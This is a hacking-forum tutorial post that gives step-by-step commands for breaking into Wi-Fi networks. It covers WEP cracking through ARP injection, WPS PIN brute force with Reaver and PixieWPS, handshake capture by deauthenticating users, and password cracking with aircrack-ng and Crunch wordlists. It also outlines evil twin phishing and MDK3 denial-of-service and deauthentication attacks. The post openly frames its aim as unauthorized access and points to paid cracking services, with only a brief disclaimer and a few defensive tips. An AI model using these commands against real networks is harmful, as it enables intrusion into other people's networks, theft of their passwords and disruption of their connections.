Home Upgrade Search Memberlist Extras Hacker Tools Award Goals Help Wiki Follow Contact

HF Rulez the UniverseHF Rulez the Universe
Raymond Reddington
Legendary Vendor
wifi hacking wep hacking wpa wpa2 wep wps kali linux wifi hack

[TuT] Introduction to Wi-Fi Hacking - WEP/WPA/WPA2 - ARP Injection, Bruteforce & MDK3

Posted 10-04-2022, 05:40 PM
[Image: mfuNoEa.png]

[Image: zsBn6iI.gif]

[Image: gXRamuy.gif]

Introduction to Wi-Fi Hacking
Introduction to WEP/WPA/WPA2 Protocol and Common Attack Vectors

[Image: bYW1jox.jpg]

[Image: gXRamuy.gif]

I.) Introduction
Wireless hacking can be defined as an attack on wireless networks or access points that offer confidential information such as authentication attacks, wifi passwords, admin portal access, and other similar data. Wireless hacking is performed for gaining unauthorized access to a private wifi network

Here are some common terminology we shall be using throughout the guide:
  • AP: An access point is a device that creates a wireless local area network, or WLAN, usually in an office or large building. An access point connects to a wired router, switch, or hub via an Ethernet cable, and projects a Wi-Fi signal to a designated area.
  • BSSID: BSSID stands for Basic Service Set Identifier, and it’s the MAC physical address of the access point or wireless router that is used to connect to the WiFi.
  • ESSID: ESSID stands for Extended Service Set Identification, which basically means the identifying name of the wireless network akin to a radio station “call sign” if you will.
  • WiFi channels are smaller bands within WiFi frequency bands that are used by your wireless network to send and receive data. Depending on which frequency band your router is using, you have a certain number of WiFi channels to choose from: 11 WiFi channels are in the 2.4 GHz frequency band
  • WPS: WPS stands for Wi-Fi Protected Setup, a network security standard that simplifies the process of connecting devices to a wireless network. It helps users add devices to their Wi-Fi networks in seconds by skipping the need to enter long passwords.
  • wlan0: wlan0 refers to a wireless network interface of your PC, which usually means a card installed inside your PC that is used to connect to a network.
  • wlan0mon: The monitor mode interface for wlan0 available within softwares such as Aircrack-ng

II.) Requirements
  • Kali Linux installation, via native OS, virtual machine or live CD.
  • WiFi adapter capable of injecting packets, strong signal reception and monitor mode support. An ideal router would be a NetGear or Alfa adapter but you can make do with low-level TP-LINK routers too.
  • Aircrack-ng*
  • Reaver*
  • PixieWPS*
  • Crunch*
  • AirGeddon
  • WifiPhisher
  • LinSet
  • WireSpy
  • MDK3*
  • WifiSlax OS Suite (optional)

    * indicates that it should be pre-installed in security-focused Linux distributions such as Kali Linux or Parrot.

III.) Setup

Before proceeding with our attack routes, we shall setup the wireless interface with monitor mode.

Code
airmon-ng
airmon-ng start wlan0
ifconfig wlan0mon down
macchanger -a wlan0mon
ifconfig wlan0mon up

[Image: k1kv9kw.jpg]

[Image: MtPhQuN.jpg]

IV.) Attacking WEP via ARP Injection
  • Wired Equivalent Privacy (WEP) was a security algorithm for 802.11 wireless networks. Introduced as part of the original IEEE 802.11 standard ratified in 1997, its intention was to provide data confidentiality comparable to that of a traditional wired network. It has been mostly redundnat in comparison to the new & improved WPA/WPA2 authentication however the fact remains that cracking WEP is a piece of cake till this date.

  • Scan for APs
    Code
    airodump-ng wlan0mon

    [Image: cV5ylps.jpg]

  • Run airodump-ng on the target AP to collect packets:
    Code
    airodump-ng --bssid <target bssid> -c <target channel number> -w output mon0

    [Image: UAkkY9N.jpg]

  • Run aireplay-ng to attempt authentication with the access point:
    Code
    aireplay-ng -1 5 -e Wifi -a <monitor interface bssid> -h <targeted ap bssid> wlan0mon

    [Image: 3G0bCwY.jpg]

  • Run aireplay-ng in ARP request replay mode to inject packets:
    Code
    aireplay-ng -3 -b <monitor interface bssid> -h <target ap bssid> wlan0mon

    [Image: 9XVpy28.jpg]

  • Wait until aireplay-ng finishes gathering upto 30-40k packets.

  • Run aircrack-ng to bruteforce the WEP key with the collected packets:
    Code
    aircrack-ng output.cap

    [Image: 4hXUncH.jpg]

V.) Attacking WPA/WPA2 via Reaver-WPS
  • Reaver implements a brute force attack against WiFi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases.

  • Start by scanning for vulnerable WiFi networks:
    Code
    wash -i wlan0mon

    [Image: ad2oQ64.png]

  • Run a bruteforce attack via Reaver to get the PIN and crack the password. This step will take some time and will heavily rely on the power supply & signal strength of your router.
    Code
    reaver -i wlan0mon -b <target bssid> -vv -c <target channel number>

    [Image: MXU4tGa.png]

  • If you happen to already have access to the pin, you can run the following command to save time:
    Code
    reaver -i wlan0mon -b <target bssid> -vv -c <target channel number> -p <PIN target ap>

  • Reaver-WPS should work for most WiFi networks protected by WPA/WPA2 as long as WPS doesn't have any additional security measures in place.

VI.) Attacking WPA/WPA2 via PixieWPS
  • PixieWPS is a tool written in C and used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some APs (using a pixie dust attack).

  • Initiate a scan for vulnerable WiFi networks:
    Code
    wash -i wlan0mon

  • Initiate a pixie dust attack to bruteforce the PIN
    Code
    reaver -i wlan1mon -b <target ap bssid> -KvvNwL -c <target channel number>

    [Image: EUaJVT4.png]

  • After successfully cracking the WPS PIN, initiate an attack to bruteforce the WPA key.
    Code
    reaver -i wlan1mon -b <target ap bssid> -vvNwL -c <target channel number> -p <PIN>

    [Image: 955pNlG.png]


VII.) Bruteforce Attack via Aircrack-ng
  • Alternatively, you can use aircrack-ng to run a bruteforce attack on the WiFi password.

  • Keep in mind this will depend upon the wordlists you have available and it may not be necessary that

  • We start by scanning for available access points:
    Code
    airodump-ng wlan0mon

  • Once we have a target access point, we will proceed to initiate monitor mode:
    Code
    airodump-ng -c <channel number> --bssid <targeted bssid> -w output wlan0mon

  • Our next step will be capturing the WPA/WPA2 handshake, this will require a fresh device to connect to our target AP.
    Code
    aireplay-ng -0 10 -a <target bssid> wlan0mon

  • Our only option here is to wait until we see the connection. Mobile devices are your best bet as they connect/disconnect often to an access point.

    [Image: GmhOrzy.png]

    [Image: zyvkXv1.png]

  • You will now require a wordlist, there is a default wordlist called "rockyou.txt" included in Kali Linux. The wordlist contains 14,344,392 common password combinations. You can alternatively download wordlists the web or common hash cracking communities.

  • Initiate a command to bruteforce the WPA/WPA2 password via aircrack-ng.
    Code
    aircrack-ng output.cap -w rockyou.txt

  • When you have a successful match, it should return the required password.

    [Image: ZVKe6So.png]

  • To create a private wordlist using Crunch, use the following steps:
    • Crunch is a wordlist generating tool that comes pre-installed with Kali Linux. It is used to generate custom keywords based on wordlists. It can generates all possible permutations and combinations of a provided keyword.
    • For example, you can run the following command:
      Code
      crunch 8 8 0123456789 Mark@@@@ -o output.txt

    • This shall create a list named "output.txt" with the following content:
      [quote]Mark0000
      Mark0001
      Mark0002
      Mark0003
      Mark0004
      Mark0005
      ... until ...
      Mark9997
      Mark9998
      Mark9999[/code]

      I'll list a few basic usage commands for the Crunch utility below:

    • To create a word list of specific numbers. 
      Code
      crunch 1 2 0123456789 -o output.txt

    • To generate a file using rainbow charset file.
      Code
      crunch 2 3 -f /usr/share/rainbowcrack/charset.txt

    • To generate wildcard pattern permutations upon a base keyword.
      Code
      crunch 10 10 -t mark^%%%% -o output.txt
      • , for all uppercase letters
      • @ for all lowercase letters
      • % for all numeric characters
      • ^ for all special characters

    • To generate a wordlist with a permutation of some strings or characters 
      Code
      crunch 1 10 -p hello world -o output.txt

VIII.) Introduction to the Evil Twin Attack
  • An evil twin attack is primarily an information-gathering attack. It leverages the use of an “evil twin” for existing wi-fi network (a new connection that looks just like a legitimate network) to trick users into providing sensitive information, whether by directly asking for it or by monitoring all network traffic flowing through the evil twin.
  • Within an evil twin attack, we select our target AP, and make a clone of it on the same channel as the original with the same BSSID and ESSID without encryption. It is effectively a phishing technique for WiFi cracking.
  • The most common tools used for evil twin attacks include Airgeddon, WiFiPhisher, LinSet and WireSpy to name a few. Since this method is fairly complex, I shall elaborate upon it within a future tutorial after explaining the concept here.
  • The primary context for an evil twin attack includes prompting the user to re-enter their password for false pretenses, such as a firmware or security update. The password thus received will be forwarded over to us, effectively automatically social engineering the target user into providing us access to the target AP themselves.
  • The illustration below explains the Evil Twin Attack perfectly:

    [Image: GZ4Y9ka.jpg]

VIII.) Introduction to MDK3

MDK is a proof-of-concept tool to exploit common IEEE 802.11 (Wi-Fi) protocol weaknesses. Features include:
  • Bruteforce MAC Filters.
  • Bruteforce hidden SSIDs (some small SSID wordlists included).
  • Probe networks to check if they can hear you.
  • Intelligent Authentication-DoS to freeze APs (with success checks).
  • FakeAP - Beacon Flooding with channel hopping (can crash NetStumbler and some buggy drivers)
  • Disconnect everything (aka AMOK-MODE) with Deauthentication and Disassociation packets.
  • WPA TKIP Denial-of-Service.
  • WDS Confusion - Shuts down large scale multi-AP installations.
  • To start with MDK3, we shall disrupt the network via the following commands:
    Code
    mdk3 wlan0mon a -a <target bssid> -n <target essid> -s 100
    mdk3 wlan0mon x 0 -t <target bssid ap> -n <target essid> -s 100

  • Initiate the following command to invoke the AMOK-MODE to deauthenticate existing users:
    Code
    mdk3 wlan0mon d -t <target bssid>

    [Image: JV20uFD.png]

  • For best results, combine this with an evil twin attack, bruteforce or pixie dust attack.[/code]

VIII.) Alternatives & Conclusion

Those should conclude the tutorial for now, I shall be mentioning a few alternate methods for Android users to monitor the security of their WiFi networks and attempt to attack available vulnerable WiFi networks (without using Kali)
  • For rooted Android devices, you should be able to use WPA Tester to crack the passwords of WPS-enabled WiFi routers. This will also work on non-rooted devices however you wouldn't be able to effectively crack the passphrases.
  • You can also use online services such as the Distributed WPA PSK Auditor or OnlineHashCrack to crack the required WPA/WPA2 passphrases.
  • You could use paid hash-cracking services such as GPUHash or the Paid Hash Bounties and Rewards subforum.
  • Basic precautions to secure your WiFi from these methods include using WPA2 encryption, strong passwords (you can use a strong pass generator), hide your ESSID, invoke maximum user limits, and enable MAC address filtering within your network
  • You can use a tool such as Who's On My Wifi or the NirSoft Wireless Network Watcher
  • For Spanish-speaking users, you can use the WiFiSlax unofficial Linux distribution which should have all the necessary tools preinstalled. Since the developers of WifiSlax are Spain-based, they only support Spanish as their OS language for now

    WifiSlax Preview (Click to View)

    Thank you to everyone who's tuned in for this tutorial suite. As always, my tutorials have been for purely educational purposes and I will try to bring forward more tutorials regarding attack techniques such as the evil twin discussed and a new concept (MiTM) within this tutorial suite. Happy hacking!

    [Image: gXRamuy.gif]

    [Image: K6U9glH.jpg]

    [Image: gXRamuy.gif]